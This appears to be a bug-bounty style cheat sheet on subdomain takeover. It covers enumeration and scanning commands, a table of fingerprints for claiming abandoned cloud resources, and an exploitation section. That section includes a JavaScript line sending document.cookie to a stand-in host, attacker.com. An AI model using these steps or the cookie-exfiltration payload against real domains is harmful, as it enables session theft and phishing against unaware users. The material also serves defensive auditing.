What is Subdomain Takeover?
When a company creates a DNS CNAME pointing blog.company.com to company.github.io and later removes the GitHub Pages site without removing the DNS record, an attacker can register company.github.io and serve arbitrary content from blog.company.com. Impact: cookie theft, phishing, CSP bypass, credential harvesting.
Enumeration
# Mass subdomain discovery
subfinder -d target.com -o subs.txt
amass enum -passive -d target.com | tee -a subs.txt
sort -u subs.txt > all_subs.txt
# DNS resolution and CNAME extraction
cat all_subs.txt | dnsx -cname -o cnames.txt
Identifying Dangling Records
# Manual check
dig CNAME blog.target.com
# If CNAME points to unclaimed resource: VULNERABLE
# Automated scanning
subjack -w all_subs.txt -t 100 -timeout 30 -o results.txt -ssl
# Nuclei takeover templates
nuclei -l all_subs.txt -t takeovers/
Fingerprinting Vulnerable Services
| Service | Response Fingerprint | Claim Via |
|---|---|---|
| GitHub Pages | "There isn't a GitHub Pages site here" | Create repo with matching name |
| AWS S3 | "NoSuchBucket" | Create S3 bucket with exact matching name |
| Heroku | "No such app" | Create Heroku app with matching name |
| Fastly | "Fastly error: unknown domain" | Create Fastly service |
| Ghost | "Domain not configured" | Register matching ghost.io subdomain |
Exploitation Impact
# Steal domain-scoped cookies from the taken-over subdomain
document.location='https://attacker.com/steal?c='+document.cookie
# CSP bypass โ if CSP includes *.victim.com, a taken-over sub can host malicious scripts
# Same-site context โ your taken-over sub has same-site=lax for the parent domain